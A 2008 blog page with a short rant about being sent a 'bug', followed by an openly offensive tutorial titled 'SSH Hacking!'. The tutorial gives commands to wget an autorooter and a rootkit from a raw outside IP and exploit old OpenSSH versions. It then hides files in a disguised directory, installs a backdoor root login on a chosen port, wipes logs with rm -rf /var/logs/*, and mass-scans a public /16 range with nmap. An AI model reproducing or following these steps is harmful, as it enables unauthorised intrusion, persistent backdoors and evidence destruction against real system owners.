Friday, January 11, 2008

Bug Attack!

Bug Attack!
Hiya everyone, I just wana inform that tha person who attacked me with a bug this morning ur not doing tha right thing dude. I know ur an intelligent hacker who have extensive knowledge in breaking firewalls but I just wana ask what u wana prove by sending me a bug. I don’t have any grudge against anyone or competing with any hacker so pliz try not to act in a negative way towards me coz I don’t have a habit of creating unnecessary enemies. And yeah, tha bug which u sent me will be fixed by tha http://java.sun.com and if u send me another bug I already have sources to fix that too. If ur from orkut I just wana say ur just proving yourself to be tha greatest looser coz there’s always a way for solving things like this………And beware of me coz i only forgive people's mistake once............

Cheers,

SSH Hacking!

SSH Hacking!
SSH Scanning and Hacking
First, we need some tools
secureCRT (https://secure.vandyke.com/vandyke-bin/download_form.cgi?PRODUCT=SecureCRT_beta)
A SSH Client to connect to an SSH box.. With this
version u can SSH with a proxy

LNX r00tkit (http://81.86.153.92/dd/lnx.gz)
a rootkit, best there is i think.. Very easy to use..
Only needed in last step

X6 (http://81.86.153.92/dd/x6.tgz)
The Autorooter..

First, you gotta have a scan with vulernable ips (or just
one )
WATcH OUT FOR SSH-1.99 OPENSSH 2.1.1 !! VERY VULERNABLE
Almost always works for exploiting..

Lets say we got an IP, 0.0.0.0, and a shell..
Connect to your shell and type :
wget http://81.86.153.92/dd/x6.tgz
it downloads the autorooter to the shell..
When its done, Type : tar xzvf x6.tgz
Then type cd x6
When in the dir, type : ./x6 -t#
it shows u all the Exploitable SSH Versions.. Lets say we got an
exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list)
The Ip = 0.0.0.0
you type :
./x6 -t123 0.0.0.0
Now it says something like : ATTACH NOW..
Wait 6 Seconds then push Enter.. Normally it starts
exploiting, it says like
1. 0x0000000 . . [SEGV]
2. 0x00000c4 . . [SURVIVED]
Something like that..

Just let it go and it will exploit your box..
If it doesnt go to 1. ..., and it says FATAL: no
its not vulernable

Then, when it exploited the box, u get some thing like :
no crash been found
Rem from Remote : CHRIS CHRIS

*** YOU ARE IN ***
Boxname
Boxhost blahblah

then type the following
cd /usr/man/man3/
and then :
mkdir ". hiden"
and then :
cd "..."
This is an hidden dir so the Sysop wont notice
Now we r going to download the Rootkit
type :
wget http://81.86.153.92/dd/lnx.gz
It will start downloading..
When done, type : tar xzvf lnx.gz
and then:
cd lnx
Then, we r going to start it..
Lets say u want password "poop" on port 25374
then u type :
./own poop 25374

It Installs the Rootkit, and Done !! Connect to the ip
with port 25374 (or the one u too
Username = root
and u gave the password urself..

now CLEANIN (for no traces):

rm -rf /var/logs/*

SSH scan TUTORIAL
USE nmap

http://www.insecure.org/nmap/nmap_download.html


syntax
for SSH scanz

nmap -O -sS -p 20-23,80,443 '194.65.*.*' > FILE.OUTPUT

-O means guess remote OS
-sS tcp syn stealth
-p ports to scan (WE include ftp telnet and ssh and HTTP and secure http)
and finaly the nets '194.65.*.*' it will scan from 194.65.1.1
to 194.65.254.254

have PHUnz

ome Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DE******IONS, AND EXAMPLES
Protecting your box to rehackers (IMPORTANT !!


Before scanin or haxin i would recomend to change thiz vars.

its very easy

works on all linux versions..


just make a shell ****** with vi ::

#!/bin/sh
####
echo Protectin ur Env to a safe hax W0rk
echo LOL.dDwAx
####
echo 1 > /proc/sys/net/ipv4/tcp_syn******s
echo 1 > /proc/sys/net/ipv4/conf/default/hidden
echo 1 > /proc/sys/net/ipv4/conf/default/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/default/forwarding
echo 1 > /proc/sys/net/ipv4/conf/default/log_martians
echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter
echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden
echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/eth0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/eth0/log_martians
echo 1 > /proc/sys/net/ipv4/conf/eth0/rp_filter
####
echo Done
echo now use ur nmap or ur exploits and have phunz
####